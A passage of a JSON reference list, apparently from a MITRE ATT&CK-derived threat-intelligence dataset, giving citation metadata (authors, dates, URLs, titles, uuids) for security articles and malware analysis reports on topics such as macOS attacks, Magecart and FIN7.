"refs": [ + "https://malwareunicorn.org/workshops/macos_dylib_injection.html#5" + ], + "source": "MITRE", + "title": "MacOS Dylib Injection Workshop" + }, + "related": [], + "uuid": "61aae3a4-317e-4117-a02a-27885709fb07", + "value": "MalwareUnicorn macOS Dylib Injection MachO" + }, + { + "description": "Tenon. (n.d.). Retrieved October 12, 2021.", + "meta": { + "date_accessed": "2021-10-12T00:00:00Z", + "refs": [ + "http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553" + ], + "source": "MITRE", + "title": "macOS Hierarchical File System Overview" + }, + "related": [], + "uuid": "4b8b110a-fc40-4094-a70d-15530bc05fec", + "value": "macOS Hierarchical File System Overview" + }, + { + "description": "kaloprominat. (2013, July 30). macos: manage add list remove login items apple script. Retrieved October 5, 2021.", + "meta": { + "date_accessed": "2021-10-05T00:00:00Z", + "date_published": "2013-07-30T00:00:00Z", + "refs": [ + "https://gist.github.com/kaloprominat/6111584" + ], + "source": "MITRE", + "title": "macos: manage add list remove login items apple script" + }, + "related": [], + "uuid": "13773d75-6fc1-4289-bf45-6ee147279052", + "value": "Add List Remove Login Items Apple Script" + }, + { + "description": "Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump. Retrieved August 20, 2021.", + "meta": { + "date_accessed": "2021-08-20T00:00:00Z", + "date_published": "2021-05-22T00:00:00Z", + "refs": [ + "https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a" + ], + "source": "MITRE", + "title": "macOS MS Office Sandbox Brain Dump" + }, + "related": [], + "uuid": "759e81c1-a250-440e-8b52-178bcf5451b9", + "value": "macOS MS office sandbox escape" + }, + { + "description": "Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans with VSCode Extensions. Retrieved April 20, 2021.", + "meta": { + "date_accessed": "2021-04-20T00:00:00Z", + "date_published": "2021-01-01T00:00:00Z", + "refs": [ + "https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/" + ], + "source": "MITRE", + "title": "macOS Post-Exploitation Shenanigans with VSCode Extensions" + }, + "related": [], + "uuid": "979cac34-d447-4e42-b17e-8ab2630bcfec", + "value": "MDSec macOS JXA and VSCode" + }, + { + "description": "Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple APIs Without Building Binaries. Retrieved July 17, 2020.", + "meta": { + "date_accessed": "2020-07-17T00:00:00Z", + "date_published": "2019-12-05T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/" + ], + "source": "MITRE", + "title": "macOS Red Team: Calling Apple APIs Without Building Binaries" + }, + "related": [], + "uuid": "4b05bd7c-22a3-4168-850c-8168700b17ba", + "value": "SentinelOne macOS Red Team" + }, + { + "description": "Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021.", + "meta": { + "date_accessed": "2021-09-10T00:00:00Z", + "date_published": "2019-07-21T00:00:00Z", + "refs": [ + "http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html" + ], + "source": "MITRE", + "title": "MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol)" + }, + "related": [], + "uuid": "159f8495-5354-4b93-84cb-a25e56fcff3e", + "value": "Lockboxx ARD 2019" + }, + { + "description": "Vivek Gite. (2023, August 22). MacOS – Set / Change $PATH Variable Command. Retrieved September 28, 2023.", + "meta": { + "date_accessed": "2023-09-28T00:00:00Z", + "date_published": "2023-08-22T00:00:00Z", + "refs": [ + "https://www.cyberciti.biz/faq/appleosx-bash-unix-change-set-path-environment-variable/" + ], + "source": "MITRE", + "title": "MacOS – Set / Change $PATH Variable Command" + }, + "related": [], + "uuid": "83daecf1-8708-56da-aaad-1e7e95c4ea43", + "value": "nixCraft macOS PATH variables" + }, + { + "description": "Stalmans, E., El-Sherei, S. (2017, October 9). Macro-less Code Exec in MSWord. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2017-10-09T00:00:00Z", + "refs": [ + "https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/" + ], + "source": "MITRE", + "title": "Macro-less Code Exec in MSWord" + }, + "related": [], + "uuid": "1036fbbb-f731-458a-b38c-42431612c0ad", + "value": "SensePost MacroLess DDE Oct 2017" + }, + { + "description": "Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017.", + "meta": { + "date_accessed": "2017-07-08T00:00:00Z", + "date_published": "2017-02-14T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/" + ], + "source": "MITRE", + "title": "Macro Malware Targets Macs" + }, + "related": [], + "uuid": "d63f3f6a-4486-48a4-b2f8-c2a8d571731a", + "value": "Macro Malware Targets Macs" + }, + { + "description": "PETER EWANE. (2017, June 9). MacSpy: OS X RAT as a Service. Retrieved September 21, 2018.", + "meta": { + "date_accessed": "2018-09-21T00:00:00Z", + "date_published": "2017-06-09T00:00:00Z", + "refs": [ + "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" + ], + "source": "MITRE", + "title": "MacSpy: OS X RAT as a Service" + }, + "related": [], + "uuid": "80bb8646-1eb0-442a-aa51-ee3efaf75915", + "value": "alientvault macspy" + }, + { + "description": "Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 22, 2021.", + "meta": { + "date_accessed": "2021-03-22T00:00:00Z", + "date_published": "2020-07-07T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/mac/2020/07/mac-thiefquest-malware-may-not-be-ransomware-after-all/" + ], + "source": "MITRE", + "title": "Mac ThiefQuest malware may not be ransomware after all" + }, + "related": [], + "uuid": "47b49df4-34f1-4a89-9983-e8bc19aadf8c", + "value": "reed thiefquest ransomware analysis" + }, + { + "description": "Thomas Reed. (2020, July 7). Mac ThiefQuest malware may not be ransomware after all. Retrieved March 18, 2021.", + "meta": { + "date_accessed": "2021-03-18T00:00:00Z", + "date_published": "2020-07-07T00:00:00Z", + "refs": [ + "https://blog.malwarebytes.com/detections/osx-thiefquest/" + ], + "source": "MITRE", + "title": "Mac ThiefQuest malware may not be ransomware after all" + }, + "related": [], + "uuid": "b265ef93-c1fb-440d-a9e0-89cf25a3de05", + "value": "Reed thiefquest fake ransom" + }, + { + "description": "Sandvik, Runa. (2021, October 1). Made In America: Green Lambert for OS X. Retrieved March 21, 2022.", + "meta": { + "date_accessed": "2022-03-21T00:00:00Z", + "date_published": "2021-10-01T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x68.html" + ], + "source": "MITRE", + "title": "Made In America: Green Lambert for OS X" + }, + "related": [], + "uuid": "fad94973-eafa-4fdb-b7aa-22c21d894f81", + "value": "Objective See Green Lambert for OSX Oct 2021" + }, + { + "description": "Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020.", + "meta": { + "date_accessed": "2020-09-09T00:00:00Z", + "date_published": "2019-10-10T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/en_us/research/19/j/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops.html" + ], + "source": "MITRE", + "title": "Magecart Card Skimmers Injected Into Online Shops" + }, + "related": [], + "uuid": "edb9395d-c8a2-46a5-8bf4-91b1d8fe6e3b", + "value": "Trend Micro FIN6 October 2019" + }, + { + "description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.", + "meta": { + "date_accessed": "2017-12-27T00:00:00Z", + "date_published": "2017-02-15T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" + ], + "source": "MITRE", + "title": "Magic Hound Campaign Attacks Saudi Targets" + }, + "related": [], + "uuid": "f1ef9868-3ddb-4289-aa92-481c35517920", + "value": "Unit 42 Magic Hound Feb 2017" + }, + { + "description": "AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021.", + "meta": { + "date_accessed": "2021-02-17T00:00:00Z", + "date_published": "1995-11-01T00:00:00Z", + "refs": [ + "https://www.amd.com/system/files/TechDocs/20213.pdf" + ], + "source": "MITRE", + "title": "Magic Packet Technical White Paper" + }, + "related": [], + "uuid": "06d36dea-e13d-48c4-b6d6-0c175c379f5b", + "value": "AMD Magic Packet" + }, + { + "description": "Microsoft Threat Intelligence Center, Microsoft Detection and Response Team, Microsoft 365 Defender Research Team . (2022, August 24). MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone. Retrieved September 28, 2022.", + "meta": { + "date_accessed": "2022-09-28T00:00:00Z", + "date_published": "2022-08-24T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/" + ], + "source": "MITRE", + "title": "MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone" + }, + "related": [], + "uuid": "5b728693-37e8-4100-ac82-b70945113e07", + "value": "MagicWeb" + }, + { + "description": "Carr, N, et all. (2019, October 10). Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques. Retrieved October 11, 2019.", + "meta": { + "date_accessed": "2019-10-11T00:00:00Z", + "date_published": "2019-10-10T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html" + ], + "source": "MITRE", + "title": "Mahalo FIN7: Responding to the Criminal Operators’ New Tools and Techniques" + }, + "related": [], + "uuid": "df8886d1-fbd7-4c24-8ab1-6261923dee96", + "value": "FireEye FIN7 Oct 2019" + }, + { + "description": "Microsoft. (2023, February 22). Mail flow rules (transport rules) in Exchange Online. Retrieved March 13, 2023.", + "meta": { + "date_accessed": "2023-03-13T00:00:00Z", + "date_published": "2023-02-22T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "source": "MITRE", + "title": "Mail flow rules (transport rules) in Exchange Online" + }, + "related": [], + "uuid": "421093d7-6ac8-5ebc-9a04-1c65bdce0980", + "value": "Microsoft Mail Flow Rules 2023" + }, + { + "description": "Bullock, B., . (2018, November 20). MailSniper. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2018-11-20T00:00:00Z", + "refs": [ + "https://github.com/dafthack/MailSniper" + ], + "source": "MITRE", + "title": "MailSniper" + }, + "related": [], + "uuid": "50595548-b0c6-49d1-adab-43c8969ae716", + "value": "GitHub MailSniper" + }, + { + "description": "Michael Kerrisk. (2021, August 27). mailx(1p) — Linux manual page. Retrieved June 10, 2022.", + "meta": { + "date_accessed": "2022-06-10T00:00:00Z", + "date_published": "2021-08-27T00:00:00Z", + "refs": [ + "https://man7.org/linux/man-pages/man1/mailx.1p.html" + ], + "source": "MITRE", + "title": "mailx(1p) — Linux manual page" + }, + "related": [], + "uuid": "6813a1a2-fbe0-4809-aad7-734997e59bea", + "value": "mailx man page" + }, + { + "description": "Nelson, M. (2014, January 23). Maintaining Access with normal.dotm. Retrieved July 3, 2017.", + "meta": { + "date_accessed": "2017-07-03T00:00:00Z", + "date_published": "2014-01-23T00:00:00Z", + "refs": [ + "https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/" + ], + "source": "MITRE", + "title": "Maintaining Access with normal.dotm" + }, + "related": [], + "uuid": "b8339d48-699d-4043-8197-1f0435a8dca5", + "value": "enigma0x3 normal.dotm" + }, + { + "description": "Sutherland, S. (2016, March 7). Maintaining Persistence via SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.", + "meta": { + "date_accessed": "2019-07-08T00:00:00Z", + "date_published": "2016-03-07T00:00:00Z", + "refs": [ + "https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/" + ], + "source": "MITRE", + "title": "Maintaining Persistence via SQL Server – Part 1: Startup Stored Procedures" + }, + "related": [], + "uuid": "afe89472-ac42-4a0d-b398-5ed6a5dee74f", + "value": "NetSPI Startup Stored Procedures" + }, + { + "description": "LOLBAS. (2018, May 25). Makecab.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Makecab/" + ], + "source": "Tidal Cyber", + "title": "Makecab.exe" + }, + "related": [], + "uuid": "6473e36b-b5ad-4254-b46d-38c53ccbe446", + "value": "Makecab.exe - LOLBAS Project" + }, + { + "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020.", + "meta": { + "date_accessed": "2020-05-15T00:00:00Z", + "date_published": "2019-01-31T00:00:00Z", + "refs": [ + "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22" + ], + "source": "MITRE", + "title": "Malicious Activity Report: Elements of Lokibot Infostealer" + }, + "related": [], + "uuid": "17ab0f84-a062-4c4f-acf9-e0b8f81c3cda", + "value": "Infoblox Lokibot January 2019" + }, + { + "description": "Cybersecurity and Infrastructure Security Agency. (2023, May 11). Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG. Retrieved May 17, 2023.", + "meta": { + "date_accessed": "2023-05-17T00:00:00Z", + "date_published": "2023-05-11T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a" + ], + "source": "Tidal Cyber", + "title": "Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG" + }, + "related": [], + "uuid": "b5ef2b97-7cc7-470b-ae97-a45dc4af32a6", + "value": "U.S. CISA PaperCut May 2023" + }, + { + "description": "Zuzana Hromcová. (2019, July 8). Malicious campaign targets South Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.", + "meta": { + "date_accessed": "2022-03-31T00:00:00Z", + "date_published": "2019-07-08T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/" + ], + "source": "MITRE", + "title": "Malicious campaign targets South Korean users with backdoor‑laced torrents" + }, + "related": [], + "uuid": "7d70675c-5520-4c81-8880-912ce918c4b5", + "value": "GoBotKR" + }, + { + "description": "De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.", + "meta": { + "date_accessed": "2018-01-17T00:00:00Z", + "date_published": "2018-01-15T00:00:00Z", + "refs": [ + "https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses" + ], + "source": "MITRE", + "title": "MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES" + }, + "related": [], + "uuid": "459bfd4a-7a9b-4d65-b574-acb221428dad", + "value": "ICEBRG Chrome Extensions" + }, + { + "description": "Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.", + "meta": { + "date_accessed": "2018-04-10T00:00:00Z", + "date_published": "2018-01-06T00:00:00Z", + "refs": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/" + ], + "source": "MITRE", + "title": "Malicious Document Targets Pyeongchang Olympics" + }, + "related": [], + "uuid": "e6b5c261-86c1-4b6b-8a5e-c6a454554588", + "value": "McAfee Malicious Doc Targets Pyeongchang Olympics" + }, + { + "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.", + "meta": { + "date_accessed": "2016-12-27T00:00:00Z", + "date_published": "2016-12-16T00:00:00Z", + "refs": [ + "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware" + ], + "source": "MITRE", + "title": "Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware" + }, + "related": [], + "uuid": "d06223d7-2d86-41c6-af23-50865a1810c0", + "value": "Fortinet Fareit" + }, + { + "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.", + "meta": { + "date_accessed": "2023-03-13T00:00:00Z", + "date_published": "2023-09-22T00:00:00Z", + "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/" + ], + "source": "MITRE", + "title": "Malicious OAuth applications abuse cloud email services to spread spam" + }, + "related": [], + "uuid": "086c06a0-3960-5fa8-b034-cef37a3aee90", + "value": "Microsoft OAuth Spam 2022" + }, + { + "description": "Yadav, A., et al. (2016, January 29). Malicious Office files dropping Kasidet and Dridex. Retrieved March 24, 2016.", + "meta": { + "date_accessed": "2016-03-24T00:00:00Z", + "date_published": "2016-01-29T00:00:00Z", + "refs": [ + "http://research.zscaler.com/2016/01/malicious-office-files-dropping-kasidet.html" + ], + "source": "MITRE", + "title": "Malicious Office files dropping Kasidet and Dridex" + }, + "related": [], + "uuid": "63077223-4711-4c1e-9fb2-3995c7e03cf2", + "value": "Zscaler Kasidet" + }, + { + "description": "Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved February 4, 2019.", + "meta": { + "date_accessed": "2019-02-04T00:00:00Z", + "date_published": "2015-12-04T00:00:00Z", + "refs": [ + "https://silentbreaksecurity.com/malicious-outlook-rules/" + ], + "source": "MITRE", + "title": "Malicious Outlook Rules" + }, + "related": [], + "uuid": "a2ad0658-7c12-4f58-b7bf-6300eacb4a8f", + "value": "SilentBreak Outlook Rules" + }, + { + "description": "Brandt, Andrew. (2011, February 22). Malicious PHP Scripts on the Rise. Retrieved October 3, 2018.", + "meta": { + "date_accessed": "2018-10-03T00:00:00Z", + "date_published": "2011-02-22T00:00:00Z", + "refs": [ + "https://www.webroot.com/blog/2011/02/22/malicious-php-scripts-on-the-rise/" + ], + "source": "MITRE", + "title": "Malicious PHP Scripts on the Rise" + }, + "related": [], + "uuid": "6d0da707-2328-4b43-a112-570c1fd5dec1", + "value": "Webroot PHP 2011" + }, + { + "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303A). Retrieved December 9, 2020.", + "meta": { + "date_accessed": "2020-12-09T00:00:00Z", + "date_published": "2020-10-29T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a" + ], + "source": "MITRE", + "title": "Malware Analysis Report (AR20-303A)" + }, + "related": [], + "uuid": "6ba168aa-ca07-4856-911f-fa48da54e471", + "value": "CISA ComRAT Oct 2020" + }, + { + "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 – PowerShell Script: ComRAT. Retrieved September 30, 2022.", + "meta": { + "date_accessed": "2022-09-30T00:00:00Z", + "date_published": "2020-10-29T00:00:00Z", + "refs": [ + "https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a" + ], + "source": "MITRE", + "title": "Malware Analysis Report (AR20-303A) MAR-10310246-2.v1 – PowerShell Script: ComRAT" + }, + "related": [], + "uuid": "9d81e2c8-09d5-4542-9c60-13a22a5a0073", + "value": "Malware Analysis Report ComRAT" + }, + { + "description": "CISA. (2020, October 29). Malware Analysis Report (AR20-303B). Retrieved December 9, 2020.", + "meta": { + "date_accessed": "2020-12-09T00:00:00Z", + "date_published": "2020-10-29T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b" + ], + "source": "MITRE", + "title": "Malware Analysis Report (AR20-303B)" + }, + "related": [], + "uuid": "b7518c4d-6c10-43d2-8e57-d354fb8d4a99", + "value": "CISA Zebrocy Oct 2020" + }, + { + "description": "CISA. (2021, January 27). Malware Analysis Report (AR21-027A). Retrieved February 22, 2021.", + "meta": { + "date_accessed": "2021-02-22T00:00:00Z", + "date_published": "2021-01-27T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a" + ], + "source": "MITRE", + "title": "Malware Analysis Report (AR21-027A)" + }, + "related": [], + "uuid": "ce300d75-8351-4d7c-b280-7d5fbe17f9bb", + "value": "CISA Supernova Jan 2021" + }, + { + "description": "National Cyber Security Centre. (2023, April 18). Malware Analysis Report: Jaguar Tooth. Retrieved August 23, 2023.", + "meta": { + "date_accessed": "2023-08-23T00:00:00Z", + "date_published": "2023-04-18T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/jaguar-tooth/NCSC-MAR-Jaguar-Tooth.pdf" + ], + "source": "Tidal Cyber", + "title": "Malware Analysis Report: Jaguar Tooth" + }, + "related": [], + "uuid": "954e0cb9-9a93-4cac-af84-c6989b973fac", + "value": "UK NCSC Jaguar Tooth April 18 2023" + }, + { + "description": "US-CERT. (2018, March 09). Malware Analysis Report (MAR) - 10135536.11.WHITE. Retrieved June 13, 2018.", + "meta": { + "date_accessed": "2018-06-13T00:00:00Z", + "date_published": "2018-03-09T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf" + ], + "source": "MITRE", + "title": "Malware Analysis Report (MAR) - 10135536.11.WHITE" + }, + "related": [], + "uuid": "b6bb568f-de15-4ace-8075-c08e7835fea2", + "value": "US-CERT SHARPKNOT June 2018" + }, + { + "description": "US-CERT. (2017, December 13). Malware Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018.", + "meta": { + "date_accessed": "2018-07-17T00:00:00Z", + "date_published": "2017-12-13T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF" + ], + "source": "MITRE", + "title": "Malware Analysis Report (MAR) - 10135536-B" + }, + "related": [], + "uuid": "af2a708d-f96f-49e7-9351-1ea703e614a0", + "value": "US-CERT Bankshot Dec 2017" + }, + { + "description": "US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.", + "meta": { + "date_accessed": "2018-07-16T00:00:00Z", + "date_published": "2017-11-01T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-D_WHITE_S508C.PDF" + ], + "source": "MITRE", + "title": "Malware Analysis Report (MAR) - 10135536-D" + }, + "related": [], + "uuid": "a3a5c26c-0d57-4ffc-ae28-3fe828e08fcb", + "value": "US-CERT Volgmer 2 Nov 2017" + }, + { + "description": "US-CERT. (2018, February 05). Malware Analysis Report (MAR) - 10135536-F. Retrieved June 11, 2018.", + "meta": { + "date_accessed": "2018-06-11T00:00:00Z", + "date_published": "2018-02-05T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf" + ], + "source": "MITRE", + "title": "Malware Analysis Report (MAR) - 10135536-F" + }, + "related": [], + "uuid": "ffc17fa5-e7d3-4592-b47b-e12ced0e62a4", + "value": "US-CERT HARDRAIN March 2018" + }, + { + "description": "US-CERT. (2018, February 06). Malware Analysis Report (MAR) - 10135536-G. Retrieved June 7, 2018.", + "meta": { + "date_accessed": "2018-06-07T00:00:00Z", + "date_published": "2018-02-06T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-G.PDF" + ], + "source": "MITRE", + "title": "Malware Analysis Report (MAR) - 10135536-G" + }, + "related": [], + "uuid": "aeb4ff70-fa98-474c-8337-9e50d07ee378", + "value": "US-CERT BADCALL" + }, + { + "description": "DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020.", + "meta": { + "date_accessed": "2020-10-02T00:00:00Z", + "date_published": "2020-10-01T00:00:00Z", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a" + ], + "source": "MITRE", + "title": "Malware Analysis Report (MAR) MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA" + }, + "related": [], + "uuid": "57c3256c-0d24-4647-9037-fefe1c88ad61", + "value": "CISA MAR SLOTHFULMEDIA October 2020" + }, + { + "description": "Nesbit, B. and Ackerman, D. (2017, January). Malware Analysis Report - RawPOS Malware: Deconstructing an Intruder’s Toolkit. Retrieved October 4, 2017.", + "meta": { + "date_accessed": "2017-10-04T00:00:00Z", + "date_published": "2017-01-01T00:00:00Z", + "refs": [ + "https://www.kroll.com/en/insights/publications/malware-analysis-report-rawpos-malware" + ], + "source": "MITRE", + "title": "Malware Analysis Report - RawPOS Malware: Deconstructing an Intruder’s Toolkit" + }, + "related": [], + "uuid": "cbbfffb9-c378-4e57-a2af-e76e6014ed57", + "value": "Kroll RawPOS Jan 2017" + }, + { + "description": "VMRAY. (2021, January 14). Malware Analysis Spotlight: OSAMiner Uses Run-Only AppleScripts to Evade Detection. Retrieved October 4, 2022.", + "meta": { + "date_accessed": "2022-10-04T00:00:00Z", + "date_published": "2021-01-14T00:00:00Z", + "refs": [ + "https://www.vmray.com/cyber-security-blog/osaminer-uses-applescripts-evade-detection-malware-analysis-spotlight/" + ], + "source": "MITRE", + "title": "Malware Analysis Spotlight: OSAMiner Uses Run-Only AppleScripts to Evade Detection" + }, + "related": [], + "uuid": "47a5d32d-e6a5-46c2-898a-e45dc42371be", + "value": "VMRay OSAMiner dynamic analysis 2021" + }, + { + "description": "Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux AUR Package Repository. Retrieved April 23, 2019.", + "meta": { + "date_accessed": "2019-04-23T00:00:00Z", + "date_published": "2018-07-10T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/" + ], + "source": "MITRE", + "title": "Malware Found in Arch Linux AUR Package Repository" + }, + "related": [], + "uuid": "0654dabf-e885-45bf-8a8e-2b512ff4bf46", + "value": "Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018" + }, + { + "description": "Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.", + "meta": { + "date_accessed": "2014-11-04T00:00:00Z", + "date_published": "2014-10-31T00:00:00Z", + "refs": [ + "http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/" + ], + "source": "MITRE", + "title": "Malware-Free Intrusions" + }, + "related": [], + "uuid": "b6635fd7-40ec-4481-bb0a-c1d3391854a7", + "value": "Alperovitch Malware" + }, + { + "description": "Kjaer, M. (2016, July 18). Malware in the browser: how you might get hacked by a Chrome extension. Retrieved November 22, 2017.", + "meta": { + "date_accessed": "2017-11-22T00:00:00Z", + "date_published": "2016-07-18T00:00:00Z", + "refs": [ + "https://kjaer.io/extension-malware/" + ], + "source": "MITRE", + "title": "Malware in the browser: how you might get hacked by a Chrome extension" + }, + "related": [], + "uuid": "b0fdf9c7-614b-4269-ba3e-7d8b02aa8502", + "value": "Chrome Extension C2 Malware" + }, + { + "description": "Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019.", + "meta": { + "date_accessed": "2019-01-17T00:00:00Z", + "refs": [ + "https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/" + ], + "source": "MITRE", + "title": "malware is more restrained than adversaries'" + }, + "related": [], + "uuid": "0c518eec-a94e-42a7-8eb7-527ae3e279b6", + "value": "FireEye Kevin Mandia Guardrails" + }, + { + "description": "Karl Greenberg. (2023, April 20). Malware is proliferating, but detection measures bear fruit: Mandiant. Retrieved September 21, 2023.", + "meta": { + "date_accessed": "2023-09-21T00:00:00Z", + "date_published": "2023-04-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.techrepublic.com/article/mandiant-malware-proliferating/" + ], + "source": "Tidal Cyber", + "title": "Malware is proliferating, but detection measures bear fruit: Mandiant" + }, + "related": [], + "uuid": "1347e21e-e77d-464d-bbbe-dc4d3f2b07a1", + "value": "TechRepublic M-Trends 2023" + }, + { + "description": "Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018.", + "meta": { + "date_accessed": "2018-01-12T00:00:00Z", + "date_published": "2016-06-06T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/malware-lingers-with-bits" + ], + "source": "MITRE", + "title": "Malware Lingers with BITS" + }, + "related": [], + "uuid": "db98b15c-399d-4a4c-8fa6-5a4ff38c3853", + "value": "CTU BITS Malware June 2016" + }, + { + "description": "Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.", + "meta": { + "date_accessed": "2021-09-29T00:00:00Z", + "date_published": "2018-11-27T00:00:00Z", + "refs": [ + "https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/" + ], + "source": "MITRE", + "title": "Malware Mitigation when Direct System Calls are Used" + }, + "related": [], + "uuid": "c13cf528-2a7d-4a32-aee2-db5db2f30298", + "value": "CyberBit System Calls" + }, + { + "description": "Bromiley, M. (2016, December 27). Malware Monday: VBScript and VBE Files. Retrieved March 17, 2023.", + "meta": { + "date_accessed": "2023-03-17T00:00:00Z", + "date_published": "2016-12-27T00:00:00Z", + "refs": [ + "https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16" + ], + "source": "MITRE", + "title": "Malware Monday: VBScript and VBE Files" + }, + "related": [], + "uuid": "9b52a72b-938a-5eb6-a3b7-5a925657f0a3", + "value": "Malware Monday VBE" + }, + { + "description": "Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. 